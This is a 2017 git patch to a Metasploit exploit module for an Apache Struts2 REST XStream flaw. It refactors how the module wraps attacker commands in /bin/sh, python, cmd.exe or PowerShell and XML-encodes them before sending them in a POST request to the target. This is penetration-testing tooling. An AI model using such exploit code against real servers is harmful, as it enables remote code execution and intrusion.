From a9a307540f69486628207c73fb15938a4b634d55 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 7 Sep 2017 19:08:37 -0500
Subject: [PATCH] Assign cmd to entire case and use encode for XML
Hat tip @acammack-r7. Forgot about that first syntax!
---
 .../exploits/multi/http/struts2_rest_xstream.rb | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/multi/http/struts2_rest_xstream.rb b/modules/exploits/multi/http/struts2_rest_xstream.rb
index 7aa97d63bf..fe010a4d21 100644
--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -86,21 +86,19 @@ class MetasploitModule < Msf::Exploit::Remote
 #
 def execute_command(cmd, opts = {})
- case target.name
+ cmd = case target.name
 when /Unix/, /Linux/
- cmd = %W{/bin/sh -c #{cmd}}
+ %W{/bin/sh -c #{cmd}}
 when /Python/
- cmd = %W{python -c #{cmd}}
+ %W{python -c #{cmd}}
 when /PowerShell/
- # This shit doesn't work yet
- require 'pry'; binding.pry
- cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
+ %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
 when /Windows/
- cmd = %W{cmd.exe /c #{cmd}}
+ %W{cmd.exe /c #{cmd}}
 end
- # Encode each command argument with HTML entities
- cmd.map! { |arg| Rex::Text.html_encode(arg) }
+ # Encode each command argument with XML entities
+ cmd.map! { |arg| arg.encode(xml: :text) }
 res = send_request_cgi(
 'method' => 'POST',